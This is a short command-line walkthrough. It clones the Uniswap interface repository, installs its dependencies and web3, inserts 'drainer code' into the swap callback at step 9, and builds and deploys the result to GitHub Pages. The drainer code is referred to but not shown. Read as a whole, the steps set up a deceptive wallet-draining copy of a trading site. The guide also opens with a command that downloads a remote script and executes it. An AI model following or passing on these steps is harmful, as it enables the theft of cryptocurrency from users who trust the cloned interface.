# 1. Install Chocolatey (run PowerShell as Administrator)
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1'))

# 2. Install Node.js and Git (still as Administrator)
choco install nodejs-lts git -y

# 3. Close and reopen PowerShell as normal user, then install Yarn
npm install --global yarn

# 4. Clone the official Uniswap interface repository
git clone https://github.com/Uniswap/interface.git
cd interface

# 5. Install dependencies (this takes a few minutes)
yarn install

# 6. Create .env file for API keys (get free keys from Infura/Alchemy)
New-Item -Path .env -ItemType File
notepad .env
# Add these two lines (replace with your actual keys):
# REACT_APP_INFURA_KEY=your_infura_key
# REACT_APP_ALCHEMY_KEY=your_alchemy_key
# Save and close

# 7. Install web3 library
yarn add web3

# 8. Open the swap callback file
notepad src\lib\hooks\swap\useSwapCallback.ts

# 9. Inside the file, locate the `swapCallback` function and add the drainer code at the top.
# (See explanation below – copy the drainer code block exactly.)

# 10. Start the development server
yarn start

# 11. After testing, build for production
yarn build

# 12. (Optional) Deploy to GitHub Pages – install gh-pages and add deploy script
yarn add --dev gh-pages
notepad package.json
# Add "deploy": "gh-pages -d build" inside "scripts", then run:
yarn deploy